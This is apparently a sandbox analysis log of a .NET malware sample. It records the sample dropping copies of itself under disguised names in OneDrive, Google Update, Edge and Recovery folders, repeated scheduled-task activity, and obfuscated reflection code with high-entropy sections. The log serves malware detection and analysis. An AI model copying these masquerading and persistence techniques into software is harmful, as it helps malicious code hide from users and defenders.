Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: version.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: profapi.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: rasman.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: winmm.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: mmdevapi.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: devobj.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: ksuser.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: avrt.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: audioses.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: midimap.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Section loaded: sspicli.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: apphelp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: version.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: wldp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: profapi.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: version.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: wldp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: profapi.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: version.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: wldp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: profapi.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Recovery\StartMenuExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 0JLWNg4Sz1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 0JLWNg4Sz1.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 0JLWNg4Sz1.exe Static file information: File size 1688064 > 1048576
Source: 0JLWNg4Sz1.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x19ba00
Source: 0JLWNg4Sz1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.cs .Net Code: Type.GetTypeFromHandle(WwK3d2aiJO0tV2nA8Ro.ST5mIdcdDJI(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(WwK3d2aiJO0tV2nA8Ro.ST5mIdcdDJI(16777245)),Type.GetTypeFromHandle(WwK3d2aiJO0tV2nA8Ro.ST5mIdcdDJI(16777259))})
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9B7700BD pushad ; iretd 0_2_00007FFD9B7700C1
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9B8D2ECA push esi; ret 0_2_00007FFD9B8D2ECB
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B7800BD pushad ; iretd 6_2_00007FFD9B7800C1
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B7A86E7 push ebp; ret 6_2_00007FFD9B7A86E8
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B7B8167 push ebx; ret 6_2_00007FFD9B7B816A
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B8F60EC push ds; retf 6_2_00007FFD9B8F60EF
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B8E2ECA push esi; ret 6_2_00007FFD9B8E2ECB
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB23BAC pushfd ; retf 6_2_00007FFD9BB23BAE
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB23AE8 pushfd ; retf 6_2_00007FFD9BB23AE9
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB2606B push ebx; retf 0007h 6_2_00007FFD9BB2610A
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB25FED push ebx; retn 0007h 6_2_00007FFD9BB2604A
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB25F5D push ebx; retn 0007h 6_2_00007FFD9BB2604A
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Code function: 7_2_00007FFD9B7600BD pushad ; iretd 7_2_00007FFD9B7600C1
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 25_2_00007FFD9B7800BD pushad ; iretd 25_2_00007FFD9B7800C1
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 26_2_00007FFD9B7900BD pushad ; iretd 26_2_00007FFD9B7900C1
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 27_2_00007FFD9B7800BD pushad ; iretd 27_2_00007FFD9B7800C1
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 27_2_00007FFD9B7A86E7 push ebp; ret 27_2_00007FFD9B7A86E8
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 28_2_00007FFD9B7886E7 push ebp; ret 28_2_00007FFD9B7886E8
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 28_2_00007FFD9B7600BD pushad ; iretd 28_2_00007FFD9B7600C1
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 29_2_00007FFD9B7886E7 push ebp; ret 29_2_00007FFD9B7886E8
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 29_2_00007FFD9B7600BD pushad ; iretd 29_2_00007FFD9B7600C1
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 30_2_00007FFD9B7700BD pushad ; iretd 30_2_00007FFD9B7700C1
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 30_2_00007FFD9B7986E7 push ebp; ret 30_2_00007FFD9B7986E8
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 31_2_00007FFD9B7986E7 push ebp; ret 31_2_00007FFD9B7986E8
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 31_2_00007FFD9B7700BD pushad ; iretd 31_2_00007FFD9B7700C1
Source: 0JLWNg4Sz1.exe Static PE information: section name: .text entropy: 7.448087998754818
Source: DViaOgnvmAhwCXZ.exe.0.dr Static PE information: section name: .text entropy: 7.448087998754818
Source: DViaOgnvmAhwCXZ.exe0.0.dr Static PE information: section name: .text entropy: 7.448087998754818
Source: smartscreen.exe.0.dr Static PE information: section name: .text entropy: 7.448087998754818
Source: StartMenuExperienceHost.exe.0.dr Static PE information: section name: .text entropy: 7.448087998754818
Source: 0JLWNg4Sz1.exe, wvEIle89Wa78kQmtPO1.cs High entropy of concatenated method names: 'EU885UEJAb', 'Wlh8xjW9tS', 'ela8Fknopr', 'plV534bcAIBGr3hTBX44', 'aGSdbabcIuTbZDWKIRfX', 'ndmwQEbcmIFKxpOPiRHp', 'IOlaDJbcP0eZns5wwCRr', 'LoD8l1YODX', 'xf48HB0x9k', 's868XVNmul'
Source: 0JLWNg4Sz1.exe, KaqhZtcES6ClRIhIKiH.cs High entropy of concatenated method names: 'UPPcTqWKmP', 'k6r', 'ueK', 'QH3', 'phhcKpo6by', 'Flush', 'lMLckfD32P', 'vGqc5Igt0x', 'Write', 'LGCcxwr2NT'
Source: 0JLWNg4Sz1.exe, rnSCIo4SY356mOYg6xJ.cs High entropy of concatenated method names: 'a8k4BMtQhS', 'vgNX6pbchLcATGJ8cmSy', 'n49HDdbc9UjjJT8iJPXN', 'KPUeBlbcrAff2AaPCifw', 'UJ6YODbcZdUL4sqWQbEX', 'VDcvH2bcjWgQJrOu30ZI', 'rN1YS3bclBoEK6yLY31j', 'nRu4JPFRRx', 'xww4UVXjZw', 'Uif4C2gyXb'
Source: 0JLWNg4Sz1.exe, M0P5Reg3OhBua3JFEbs.cs High entropy of concatenated method names: 'xEFgsAMCL5', 'AMJgiaOmF7', 'pXxgOTeMJ5', 'qDfg15rna4', 'UYpgNdTZbk', 'yOlR7IbXRbwSbK4w5a5l', 'B8jDoZbX40aYgnnLWQcO', 'wHQSLebXQtnIKdZsNXAI', 'eDooxvbXeJRJ2LQjIt3f', 'GurnVpbX3hmsf4UQRUus'
Source: 0JLWNg4Sz1.exe, U3MAduneXottqUEf6bE.cs High entropy of concatenated method names: 'f1vnpI4bgi', 'bTUnYysG3r', 'OmYnsLERrM', 'FJOniWQd54', 'MEynO6ZH1U', 'IZPn1mqmCW', 'RoSnNMVw8g', 'DSOnoo1e3L', 'oHmnWWk9gL', 'okCnSa8dsi'
Source: 0JLWNg4Sz1.exe, xA03rpSrrdcyjaXV34v.cs High entropy of concatenated method names: 'i5CSXFceJY', 'QZlS0IUlCm', 'FegS2w4y0o', 'tpJi2Ebh8Lb8VCY3UJIG', 'oD4co4bh4SGI541pRuFa', 'RCJoQybhA4aLcr5xIs8m', 'aQ3x7AbhIcN2Rfemciv1', 's7qShi6fIC', 'UpgS9CYfZY', 'aS7SjUFouM'
Source: 0JLWNg4Sz1.exe, yJj1Fl7EmMa94jy6Uni.cs High entropy of concatenated method names: 'Yh4kKMbG5Xh0PJ04F61W', 'vbL50QbGKmltjM9WhQug', 'qVbMZGbGkevO0jVGr3hx', 'nvI6JgbGx56YEmUwaAba', 'jpQ7TBvWBa', 'Mh9', 'method_0', 'ci87KNJSui', 'gFg7kphCwS', 'E0V755tEqC'
